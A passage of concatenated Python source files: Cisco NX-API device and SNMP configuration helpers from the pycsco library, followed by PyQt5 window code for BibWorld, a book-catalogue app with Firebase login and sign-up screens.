self.password = <PASSWORD>
creds_file = home + '/.netauth'
if os.path.isfile(creds_file):
with open(creds_file, 'r') as creds:
auth = yaml.load(creds)
try:
self.username = auth[vendor][model]['username']
self.password = auth[vendor][model]['password']
except:
pass
class Device():
def __init__(self,
username='cisco',
password='<PASSWORD>',
ip='192.168.200.50',
protocol='http',
port=None,
timeout=30):
if protocol not in ('http', 'https'):
raise ValueError('protocol must be http or https')
self.username = username
self.password = password
self.ip = ip
self.protocol = protocol
self.timeout = timeout
self.port = port
self.sw1 = NXAPI()
if self.port is not None:
self.sw1.set_target_url('%s://%s:%s/ins' % (self.protocol,
self.ip, self.port))
else:
self.sw1.set_target_url('%s://%s/ins' % (self.protocol,
self.ip))
self.sw1.set_username(self.username)
self.sw1.set_password(self.password)
self.sw1.set_timeout(self.timeout)
def open(self):
# keeping to phase out programs that still use it.
pass
def cli_error_check(self, data_dict):
clierror = None
msg = None
has_clierror = False
error_check_list = data_dict['ins_api']['outputs']['output']
try:
for index, each in enumerate(error_check_list):
clierror = each.get('clierror', None)
msg = each.get('msg', None)
if 'clierror' in each:
has_clierror = True
except AttributeError:
clierror = error_check_list.get('clierror', None)
msg = error_check_list.get('msg', None)
has_clierror = 'clierror' in error_check_list
if clierror or has_clierror:
return CLIError(clierror, msg, index)
def show(self, command, fmat='xml', text=False):
if text is False:
self.sw1.set_msg_type('cli_show')
elif text:
self.sw1.set_msg_type('cli_show_ascii')
self.sw1.set_out_format(fmat)
self.sw1.set_cmd(command)
data = self.sw1.send_req()
if fmat == 'xml':
data_dict = xmltodict.parse(data[1])
elif fmat == 'json':
data_dict = json.loads(data[1])
clierror = self.cli_error_check(data_dict)
if clierror:
raise clierror
return data
def config(self, command, fmat='xml'):
self.sw1.set_msg_type('cli_conf')
self.sw1.set_out_format(fmat)
self.sw1.set_cmd(command)
data = self.sw1.send_req()
# return self.sw1.send_req
if fmat == 'xml':
data_dict = xmltodict.parse(data[1])
elif fmat == 'json':
data_dict = json.loads(data[1])
clierror = self.cli_error_check(data_dict)
if clierror:
raise clierror
return data
```
#### File: nxos/utils/snmp.py
```python
from pycsco.nxos.device import Device
from pycsco.nxos.utils import legacy
import json
try:
import xmltodict
except ImportError as e:
print '*' * 30
print e
print '*' * 30
__all__ = []
def get_snmp_community(device, find_filter=None):
"""Retrieves snmp community settings for a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
community (str): optional arg to filter out this specific community
Returns:
dictionary
"""
command = 'show snmp community'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
c_dict = {}
try:
comm_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_snmp_community')['ROW_snmp_community']
for each in comm_table:
community = {}
key = str(each['community_name'])
community['group'] = str(each['grouporaccess'])
community['acl'] = str(each['aclfilter'])
c_dict[key] = community
except (TypeError):
community = {}
key = str(each['community_name'])
community['group'] = str(comm_table['grouporaccess'])
community['acl'] = str(comm_table['aclfilter'])
c_dict[key] = community
except (KeyError, AttributeError):
return c_dict
if find_filter:
find = c_dict.get(find_filter, None)
if find_filter is None or find is None:
return {}
else:
return find
def remove_snmp_community(community):
return ['no snmp-server community ' + community]
def config_snmp_community(delta, community):
CMDS = {
'group': 'snmp-server community {0} group {group}',
'acl': 'snmp-server community {0} use-acl {acl}'
}
commands = []
for k, v in delta.iteritems():
cmd = CMDS.get(k).format(community, **delta)
if cmd:
commands.append(cmd)
cmd = None
return commands
def get_snmp_groups(device):
"""Retrieves snmp groups for a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
Returns:
list of groups
"""
command = 'show snmp group'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
g_list = []
try:
group_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_role')['ROW_role']
for each in group_table:
g_list.append(each['role_name'])
except (KeyError, AttributeError):
return g_list
return g_list
def remove_snmp_user(user):
return ['no snmp-server user ' + user]
def config_snmp_user(proposed, user, reset, new):
# check to see if it was a new config
# and see if it is going from a non-encrypted
# password to an encrypted one
if reset and not new:
commands = remove_snmp_user(user)
else:
commands = []
group = proposed.get('group', None)
cmd = ''
if group:
cmd = 'snmp-server user {0} {group}'.format(user, **proposed)
auth = proposed.get('authentication', None)
pwd = proposed.get('pwd', None)
if auth and pwd:
cmd += ' auth {authentication} {pwd}'.format(**proposed)
encrypt = proposed.get('encrypt', None)
privacy = proposed.get('privacy', None)
if encrypt and privacy:
cmd += ' priv {encrypt} {privacy}'.format(**proposed)
elif privacy:
cmd += ' priv {privacy}'.format(**proposed)
if cmd:
commands.append(cmd)
return commands
def get_snmp_user(device, user):
"""Retrieves snmp user configuration for a given user on a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
user (str): name of user (max size 28 chars)
Returns:
dictionary
"""
command = 'show snmp user ' + user
data = device.show(command)
data_dict = xmltodict.parse(data[1])
resource = {}
try:
resource_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_snmp_users')['ROW_snmp_users']
resource['user'] = str(resource_table['user'])
resource['authentication'] = str(resource_table['auth']).strip()
encrypt = str(resource_table['priv']).strip()
if encrypt.startswith('aes'):
resource['encrypt'] = 'aes-128'
else:
resource['encrypt'] = 'none'
group_table = resource_table['TABLE_groups']['ROW_groups']
groups = []
try:
for group in group_table:
groups.append(str(group['group']))
except TypeError:
groups.append(str(group_table['group']))
resource['group'] = groups
except (KeyError, AttributeError):
return resource
return resource
def get_snmp_contact(device):
"""Retrieves snmp contact from a device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
Returns:
dictionary
"""
command = 'show run snmp'
data = device.show(command, text=True)
data_dict = xmltodict.parse(data[1])
raw_text = data_dict['ins_api']['outputs']['output']['body']
existing = legacy.get_structured_data('snmp_contact.tmpl', raw_text)
if len(existing) == 1:
return existing[0]
return existing
def get_snmp_location(device):
"""Retrieves snmp location from a device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
Returns:
dictionary
"""
command = 'show run snmp'
data = device.show(command, text=True)
data_dict = xmltodict.parse(data[1])
raw_text = data_dict['ins_api']['outputs']['output']['body']
existing = legacy.get_structured_data('snmp_location.tmpl', raw_text)
if len(existing) == 1:
return existing[0]
return existing
def get_snmp_host(device, host):
"""Retrieves snmp host configuration for a given host on a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
host (str): IP Address or hostname of snmp host
Returns:
dictionary
"""
command = 'show snmp host'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
resource = {}
try:
resource_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_host')['ROW_host']
for each in resource_table:
temp = {}
key = str(each['host'])
temp['udp'] = str(each['port']).strip()
temp['version'] = str(each['version']).strip()
temp['v3'] = str(each['level']).strip()
temp['type'] = str(each['type']).strip()
temp['community'] = str(each['secname']).strip()
src = each.get('src_intf', None)
if src:
temp['src_intf'] = src.split(':')[1].strip()
vrf_filt = each.get('TABLE_vrf_filters', None)
if vrf_filt:
temp['vrf_filter'] = vrf_filt['ROW_vrf_filters']['vrf_filter'].split(':')[1].split(',')
vrf = each.get('vrf', None)
if vrf:
temp['vrf'] = vrf.split(':')[1].strip()
resource[key] = temp
except (TypeError):
temp = {}
key = str(resource_table['host'])
temp['udp'] = str(resource_table['port']).strip()
temp['version'] = str(resource_table['version']).strip()
temp['v3'] = str(resource_table['level']).strip()
temp['type'] = str(resource_table['type']).strip()
temp['community'] = str(resource_table['secname']).strip()
src = resource_table.get('src_intf', None)
if src:
temp['src_intf'] = src.split(':')[1].strip()
vrf_filt = resource_table.get('TABLE_vrf_filters', None)
if vrf_filt:
temp['vrf_filter'] = vrf_filt['ROW_vrf_filters']['vrf_filter'].split(':')[1].split(',')
vrf = resource_table.get('vrf', None)
if vrf:
temp['vrf'] = vrf.split(':')[1].strip()
resource[key] = temp
except (KeyError, AttributeError):
return resource
find = resource.get(host, None)
if find:
return find
else:
return {}
def remove_snmp_host(host, existing):
commands = []
if existing['version'] == 'v3':
existing['version'] = '3'
command = 'no snmp-server host {0} {type} version {version} {v3} {community}'.format(host, **existing)
elif existing['version'] == 'v2c':
existing['version'] = '2c'
command = 'no snmp-server host {0} {type} version {version} {community}'.format(host, **existing)
if command:
commands.append(command)
return commands
def config_snmp_host(delta, proposed, existing):
commands = []
host = proposed['snmp_host']
cmd = 'snmp-server host ' + proposed['snmp_host']
type1 = delta.get('type', None)
version = delta.get('version', None)
ver = delta.get('v3', None)
community = delta.get('community', None)
if any([type1, version, ver, community]):
cmd += ' ' + (type1 or existing.get('type'))
version = version or existing.get('version')
if version == 'v2c':
vn = '2c'
elif version == 'v3':
vn = '3'
cmd += ' version ' + vn
if ver:
cmd += ' '
cmd += (ver or existing.get('v3'))
cmd += ' '
cmd += (community or existing.get('community'))
commands.append(cmd)
CMDS = {
'vrf_filter': 'snmp-server host {0} filter-vrf {vrf_filter}',
'vrf': 'snmp-server host {0} use-vrf {vrf}',
'udp': 'snmp-server host {0} udp-port {udp}',
'src_intf': 'snmp-server host {0} source-interface {src_intf}'
}
for key, value in delta.iteritems():
if key in ['vrf_filter', 'vrf', 'udp', 'src_intf']:
command = CMDS.get(key, None)
if command:
cmd = command.format(host, **delta)
commands.append(cmd)
cmd = None
return commands
def get_snmp_traps(device, group):
"""Retrieves snmp traps configuration for a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
group (str): group of snmp traps as defined in the switch
Returns:
list
"""
command = 'show snmp trap'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
resource = {}
try:
resource_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_snmp_trap')['ROW_snmp_trap']
for each in ['aaa', 'bridge', 'callhome', 'cfs', 'config', 'entity',
'feature-control', 'hsrp', 'license', 'link', 'lldp',
'ospf', 'rf', 'rmon', 'snmp', 'storm-control', 'stpx',
'sysmgr', 'system', 'upgrade', 'vtp']:
resource[each] = []
for each in resource_table:
temp = {}
key = str(each['trap_type'])
temp['trap'] = str(each['description'])
temp['enabled'] = str(each['isEnabled'])
if key != 'Generic':
resource[key].append(temp)
except (KeyError, AttributeError):
return resource
find = resource.get(group, None)
if group == 'all'.lower():
return resource
elif find:
return find
else:
return []
```
|
{
"source": "JedersonLuz/BibWorld",
"score": 2
}
|
#### File: JedersonLuz/BibWorld/stackedMainWindow.py
```python
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox
import PyrebaseConnector as PC
import BibWorld
import sys
class Ui_Main(QtWidgets.QWidget):
def setupUi(self, Main):
Main.setObjectName("Main")
Main.resize(800, 480)
self.flagEdit = 4
self.QtStack = QtWidgets.QStackedLayout()
self.stack0 = QtWidgets.QMainWindow()
self.stack1 = QtWidgets.QMainWindow()
self.stack2 = QtWidgets.QMainWindow()
self.stack3 = QtWidgets.QMainWindow()
self.stack4 = QtWidgets.QMainWindow()
self.stack5 = QtWidgets.QMainWindow()
self.stack6 = QtWidgets.QMainWindow()
self.stack7 = QtWidgets.QMainWindow()
self.stack8 = QtWidgets.QMainWindow()
self.stack9 = QtWidgets.QMainWindow()
self.login_ui = BibWorld.loginWindows.Ui_Form()
self.login_ui.setupUi(self.stack0)
self.add_user_ui = BibWorld.telaAddUser.Ui_Form()
self.add_user_ui.setupUi(self.stack8)
self.main_ui = BibWorld.Ui_MainWindow()
self.main_ui.setupUi(self.stack1)
self.add_ui = BibWorld.telaAdd.Add_Form()
self.add_ui.setupUi(self.stack2)
self.remove_ui = BibWorld.Remover.Ui_RemoveWindow()
self.remove_ui.setupUi(self.stack3)
self.edit_ui = BibWorld.telaEditar.Ui_EditWindow()
self.edit_ui.setupUi(self.stack4)
self.edit_form_ui = BibWorld.telaEditForm.Edit_Form()
self.edit_form_ui.setupUi(self.stack5)
self.search_ui = BibWorld.telaBuscar.Ui_BuscarWindow()
self.search_ui.setupUi(self.stack6)
self.read_ui = BibWorld.telaVerLivro.Ui_MainWindow()
self.read_ui.setupUi(self.stack7)
self.editUser_ui = BibWorld.telaEditUser.Ui_Form()
self.editUser_ui.setupUi(self.stack9)
self.QtStack.addWidget(self.stack0)
self.QtStack.addWidget(self.stack1)
self.QtStack.addWidget(self.stack2)
self.QtStack.addWidget(self.stack3)
self.QtStack.addWidget(self.stack4)
self.QtStack.addWidget(self.stack5)
self.QtStack.addWidget(self.stack6)
self.QtStack.addWidget(self.stack7)
self.QtStack.addWidget(self.stack8)
self.QtStack.addWidget(self.stack9)
class Main(QMainWindow, Ui_Main):
def __init__(self, parent=None):
super(Main, self).__init__(parent)
self.setupUi(self)
self.login_ui.pushButton.clicked.connect(self.MakeLogin)
self.login_ui.pushButton_2.clicked.connect(self.OpenSignUpWindow)
self.add_user_ui.buttonSubmit.clicked.connect(self.MakeSignUp)
self.add_user_ui.buttonBack.clicked.connect(self.OpenLoginWindow)
self.main_ui.buttonAddBook.clicked.connect(self.OpenAddWindow)
self.add_ui.button_voltar.clicked.connect(self.OpenMainWindow)
self.main_ui.buttonRemoveBook.clicked.connect(self.OpenRemoveWindow)
self.remove_ui.botao_voltar.clicked.connect(self.OpenMainWindow)
self.main_ui.buttonEditBook.clicked.connect(self.OpenEditWindow)
self.edit_ui.botao_voltar.clicked.connect(self.OpenMainWindow)
self.edit_ui.botao_editar.clicked.connect(self.OpenEditFormWindows)
self.edit_form_ui.button_cadastrar.clicked.connect(self.editBook)
self.edit_form_ui.button_voltar.clicked.connect(self.BackEdit)
self.main_ui.buttonSearch.clicked.connect(self.OpenBuscarWindow)
self.search_ui.botao_voltar.clicked.connect(self.OpenMainWindow)
self.search_ui.botao_buscar.clicked.connect(self.OpenReadWindow)
self.read_ui.button_back.clicked.connect(self.OpenBuscarWindow)
self.read_ui.pushButton.clicked.connect(self.OpenEditFormWindows_telaVerLivro)
self.main_ui.buttonEditUser.clicked.connect(self.OpenEditUser)
self.main_ui.buttonExit.clicked.connect(self.messageBoxExit)
self.editUser_ui.button_back.clicked.connect(self.OpenMainWindow)
def MakeLogin(self):
erroVazio = 0
if (self.login_ui.lineEdit.text() == '') or (self.login_ui.lineEdit_2.text() == ''):
self.edit_ui.messageBox('Campos obrigatórios!', 'Erro')
erroVazio = 1
if erroVazio == 0:
email = self.login_ui.lineEdit.text()
password = self.login_ui.lineEdit_2.text()
response = PC.pc.login(email, password)
if response == 'Ok':
self.OpenMainWindow()
else:
self.edit_ui.messageBox(response, 'Erro')
def messageBoxExit(self):
infoBox = QMessageBox()
infoBox.setIcon(QMessageBox.Information)
infoBox.setText('Tem certeza que deseja sair?')
infoBox.setWindowTitle('Alerta')
infoBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
infoBox.buttonClicked.connect(self.BackLogin)
infoBox.exec_()
def BackLogin(self, choosedButton):
if choosedButton.text() == '&Yes':
self.login_ui.lineEdit.setText('')
self.login_ui.lineEdit_2.setText('')
self.OpenLoginWindow()
def MakeSignUp(self):
email = self.add_user_ui.lineEditEmail.text()
password = self.add_user_ui.lineEditPassword.text()
password_2 = self.add_user_ui.lineEditPassword_2.text()
displayName = self.add_user_ui.lineEditUserName.text()
dateBirth = self.add_user_ui.dateBirth.text()
gender = self.add_user_ui.selectGender.currentText()
erroVazio = 0
if (email == '') or (password == '') or (password_2 == '') or (displayName == ''):
self.edit_ui.messageBox('Campos obrigatórios.', 'Erro')
erroVazio = 1
erroSenha = 0
if (password != password_2) and (erroVazio == 0):
self.edit_ui.messageBox('Os campos de senha não coincidem.', 'Erro')
erroSenha = 1
if (erroVazio == 0) and (erroSenha == 0):
response = PC.pc.signUp(email, password, displayName, dateBirth, gender)
if response == 'Ok':
self.edit_ui.messageBox('Cadastro realizado com sucesso. Bem-vindo (a) ao BibWorld!', 'Confirmação')
self.OpenLoginWindow()
else:
self.edit_ui.messageBox(response, 'Erro')
def OpenSignUpWindow(self):
self.QtStack.setCurrentIndex(8)
def OpenLoginWindow(self):
self.QtStack.setCurrentIndex(0)
def OpenMainWindow(self):
keyUser = PC.pc.auth.current_user['localId']
currentUser = PC.pc.db.child('users').child(keyUser).get()
self.main_ui.labelUser1.setText(currentUser.val()['displayName'])
self.QtStack.setCurrentIndex(1)
def OpenAddWindow(self):
self.QtStack.setCurrentIndex(2)
def OpenRemoveWindow(self):
self.remove_ui.updateTable()
self.QtStack.setCurrentIndex(3)
def OpenEditWindow(self):
self.edit_ui.updateTable()
self.QtStack.setCurrentIndex(4)
def OpenEditFormWindows(self):
self.flagEdit = 4
if self.edit_ui.lineEdit.text() == '':
self.edit_ui.messageBox("Campo obrigatório!", "Aviso")
else:
try:
int(self.edit_ui.lineEdit.text())
book = PC.pc.searchBook_ISBN(self.edit_ui.lineEdit.text())
if book:
self.edit_form_ui.lineTitulo.setText(book['title'])
self.edit_form_ui.lineISBN.setText(str(book['ISBN']))
self.edit_form_ui.lineAutor.setText(book['leadAutor'])
self.edit_form_ui.lineNumPag.setText(str(book['numPages']))
self.edit_form_ui.dateEdit.setDate(QtCore.QDate(int(book['pubDate'].split('/')[2]), int(book['pubDate'].split('/')[1]), int(book['pubDate'].split('/')[0])))
self.QtStack.setCurrentIndex(5)
self.edit_ui.lineEdit.setText('')
else:
self.edit_ui.messageBox("ISBN não encontrado!", "Erro")
except:
self.edit_ui.messageBox("O ISBN é um campo de números! Tente novamente!", "Erro")
def OpenEditFormWindows_telaVerLivro(self):
self.flagEdit = 7
self.edit_form_ui.lineTitulo.setText(self.read_ui.book['title'])
self.edit_form_ui.lineISBN.setText(str(self.read_ui.book['ISBN']))
self.edit_form_ui.lineAutor.setText(self.read_ui.book['leadAutor'])
self.edit_form_ui.lineNumPag.setText(str(self.read_ui.book['numPages']))
self.edit_form_ui.dateEdit.setDate(QtCore.QDate(int(self.read_ui.book['pubDate'].split('/')[2]), int(self.read_ui.book['pubDate'].split('/')[1]), int(self.read_ui.book['pubDate'].split('/')[0])))
self.QtStack.setCurrentIndex(5)
def OpenBuscarWindow(self):
self.search_ui.updateTable()
self.QtStack.setCurrentIndex(6)
def OpenReadWindow(self):
self.flagEdit = 7
erroVazio = 0
if(self.search_ui.lineEdit.text() == ''):
self.edit_ui.messageBox('Campo obrigatório!', 'Erro')
erroVazio = 1
if(erroVazio == 0):
self.read_ui.book = PC.pc.searchBook_ISBN(self.search_ui.lineEdit.text())
if(self.read_ui.book != None):
self.read_ui.UpdateTable()
self.QtStack.setCurrentIndex(7)
else:
self.edit_ui.messageBox('ISBN não existe!', 'Erro')
def OpenEditUser(self):
keyUser = PC.pc.auth.current_user['localId']
email = PC.pc.auth.current_user['email']
currentUser = PC.pc.db.child('users').child(keyUser).get()
self.editUser_ui.lineEdit_4.setText(email)
self.editUser_ui.lineEdit_5.setText(currentUser.val()['displayName'])
self.editUser_ui.dateEdit.setDate(QtCore.QDate(int(currentUser.val()['dateBirth'].split('/')[2]), int(currentUser.val()['dateBirth'].split('/')[1]), int(currentUser.val()['dateBirth'].split('/')[0])))
if currentUser.val()['gender'] == 'Feminino': gender = 0
else: gender = 1
self.editUser_ui.comboBox.setCurrentIndex(gender)
self.QtStack.setCurrentIndex(9)
def editBook(self):
erroNum = 0
erroISBN = 0
erroVazio = 0
if((self.edit_form_ui.lineISBN.text() == '') or (self.edit_form_ui.lineTitulo.text() == '') or (self.edit_form_ui.lineAutor.text() == '') or (self.edit_form_ui.lineNumPag.text() == '') or (self.edit_form_ui.fname == '')):
self.edit_form_ui.messageBox("Todas os campos devem ser preenchidos!", "Campos obrigatórios")
erroVazio = 1
if((erroISBN == 0) and (erroVazio == 0)):
try:
int(self.edit_form_ui.lineISBN.text())
except:
self.edit_form_ui.messageBox("O ISBN é um campo de números! Tente novamente!", "Erro")
erroISBN = 1
if(erroNum == 0 and (erroISBN == 0) and (erroVazio == 0)):
try:
int(self.edit_form_ui.lineNumPag.text())
except:
self.edit_form_ui.messageBox("Número de páginas inválido! Tente novamente!", "Erro")
erroNum = 1
if((erroISBN == 0) and (erroNum == 0) and (erroVazio == 0)):
PC.pc.updateBook(self.edit_form_ui.lineISBN.text(), self.edit_form_ui.lineTitulo.text(), self.edit_form_ui.lineAutor.text(), self.edit_form_ui.lineNumPag.text(), self.edit_form_ui.dateEdit.text(), self.edit_form_ui.fname)
self.edit_form_ui.messageBox("Alterações salvas com sucesso!", "Confirmação de alteração")
self.edit_form_ui.lineISBN.setText('')
self.edit_form_ui.lineTitulo.setText('')
self.edit_form_ui.lineAutor.setText('')
self.edit_form_ui.lineNumPag.setText('')
self.QtStack.setCurrentIndex(self.flagEdit)
def BackEdit(self):
self.QtStack.setCurrentIndex(self.flagEdit)
if __name__ == '__main__':
app = QApplication(sys.argv)
showMain = Main()
sys.exit(app.exec_())
```
#### File: BibWorld/telas/telaAddUser.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(577, 502)
Form.setFixedSize(577, 502)
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(80, 10, 401, 61))
self.label.setObjectName("label")
self.layoutWidget = QtWidgets.QWidget(Form)
self.layoutWidget.setGeometry(QtCore.QRect(170, 108, 231, 321))
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.labelEmail = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelEmail.setFont(font)
self.labelEmail.setObjectName("labelEmail")
self.verticalLayout.addWidget(self.labelEmail)
self.lineEditEmail = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditEmail.setObjectName("lineEditEmail")
self.lineEditEmail.setPlaceholderText('Informe o seu email')
self.verticalLayout.addWidget(self.lineEditEmail)
self.labelUserName = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelUserName.setFont(font)
self.labelUserName.setObjectName("labelUserName")
self.verticalLayout.addWidget(self.labelUserName)
self.lineEditUserName = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditUserName.setObjectName("lineEditUserName")
self.lineEditUserName.setPlaceholderText('Informe o seu nome de usuário')
self.verticalLayout.addWidget(self.lineEditUserName)
self.labelPassword = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelPassword.setFont(font)
self.labelPassword.setObjectName("labelPassword")
self.verticalLayout.addWidget(self.labelPassword)
self.lineEditPassword = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditPassword.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditPassword.setObjectName("lineEditPassword")
self.lineEditPassword.setPlaceholderText('Informe a sua senha')
self.verticalLayout.addWidget(self.lineEditPassword)
self.labelPassword2 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelPassword2.setFont(font)
self.labelPassword2.setObjectName("labelPassword2")
self.verticalLayout.addWidget(self.labelPassword2)
self.lineEditPassword_2 = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditPassword_2.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditPassword_2.setObjectName("lineEditPassword_2")
self.lineEditPassword_2.setPlaceholderText('<PASSWORD>ha')
self.verticalLayout.addWidget(self.lineEditPassword_2)
self.labelDateBirth = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelDateBirth.setFont(font)
self.labelDateBirth.setObjectName("labelDateBirth")
self.verticalLayout.addWidget(self.labelDateBirth)
self.dateBirth = QtWidgets.QDateEdit(self.layoutWidget)
self.dateBirth.setObjectName("dateBirth")
self.verticalLayout.addWidget(self.dateBirth)
self.labelGender = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelGender.setFont(font)
self.labelGender.setObjectName("labelGender")
self.verticalLayout.addWidget(self.labelGender)
self.selectGender = QtWidgets.QComboBox(self.layoutWidget)
self.selectGender.setObjectName("selectGender")
self.selectGender.addItem('Feminino')
self.selectGender.addItem('Masculino')
self.verticalLayout.addWidget(self.selectGender)
self.buttonSubmit = QtWidgets.QPushButton(Form)
self.buttonSubmit.setGeometry(QtCore.QRect(260, 450, 141, 29))
self.buttonSubmit.setStyleSheet('background-color:#1f4c73')
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.buttonSubmit.setFont(font)
self.buttonSubmit.setObjectName("buttonSubmit")
self.buttonBack = QtWidgets.QPushButton(Form)
self.buttonBack.setGeometry(QtCore.QRect(170, 450, 71, 29))
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.buttonBack.setFont(font)
self.buttonBack.setObjectName("buttonBack")
self.buttonBack.setStyleSheet('background-color:#1f4c73')
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle("Cadastro de Usuário")
self.label.setText(_translate("Form", "TextLabel"))
pixmap = QtGui.QPixmap("icons/iconCadUser.png")
pixmap3 = pixmap.scaled(400, 80, QtCore.Qt.KeepAspectRatio)
self.label.setPixmap(pixmap3)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.labelEmail.setText(_translate("Form", "Email:"))
self.labelUserName.setText(_translate("Form", "Nome de usuário:"))
self.labelPassword.setText(_translate("Form", "Senha:"))
self.labelPassword2.setText(_translate("Form", "Confirme a senha:"))
self.labelDateBirth.setText(_translate("Form", "Data de nascimento:"))
self.labelGender.setText(_translate("Form", "Sexo:"))
self.buttonSubmit.setText(_translate("Form", "Concluir cadastro"))
self.buttonBack.setText(_translate("Form", "Voltar"))
```
#### File: BibWorld/telas/telaEditUser.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox
import PyrebaseConnector as PC
import sys
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(577, 502)
Form.setFixedSize(577, 502)
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(80, 25, 401, 61))
self.label.setObjectName("label")
self.layoutWidget = QtWidgets.QWidget(Form)
self.layoutWidget.setGeometry(QtCore.QRect(170, 120, 231, 261))
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.label_6 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.verticalLayout.addWidget(self.label_6)
self.lineEdit_4 = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEdit_4.setObjectName("lineEdit_4")
self.lineEdit_4.setDisabled(True)
self.verticalLayout.addWidget(self.lineEdit_4)
self.label_7 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.verticalLayout.addWidget(self.label_7)
self.lineEdit_5 = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEdit_5.setObjectName("lineEdit_5")
self.verticalLayout.addWidget(self.lineEdit_5)
self.label_5 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setObjectName("label_5")
self.verticalLayout.addWidget(self.label_5)
self.dateEdit = QtWidgets.QDateEdit(self.layoutWidget)
self.dateEdit.setObjectName("dateEdit")
self.verticalLayout.addWidget(self.dateEdit)
self.label_4 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.verticalLayout.addWidget(self.label_4)
self.comboBox = QtWidgets.QComboBox(self.layoutWidget)
self.comboBox.setObjectName("comboBox")
self.comboBox.addItem('Feminino')
self.comboBox.addItem('Masculino')
self.verticalLayout.addWidget(self.comboBox)
self.buttonResetPass = QtWidgets.QPushButton(Form)
self.buttonResetPass.setObjectName('buttonResetPass')
self.buttonResetPass.setGeometry(QtCore.QRect(250, 410, 71, 31))
self.buttonResetPass.setStyleSheet('background-color:#1f4c73')
self.buttonResetPass.setFont(font)
self.button_cadastrar = QtWidgets.QPushButton(Form)
self.button_cadastrar.setGeometry(QtCore.QRect(330, 410, 71, 31))
self.button_cadastrar.setStyleSheet('background-color:#1f4c73')
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.button_cadastrar.setFont(font)
self.button_cadastrar.setObjectName("button_cadastrar")
self.button_back = QtWidgets.QPushButton(Form)
self.button_back.setGeometry(QtCore.QRect(170, 410, 71, 31))
self.button_back.setStyleSheet('background-color:#1f4c73')
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.button_back.setFont(font)
self.button_back.setObjectName("button_back")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.label.setText(_translate("Form", "TextLabel"))
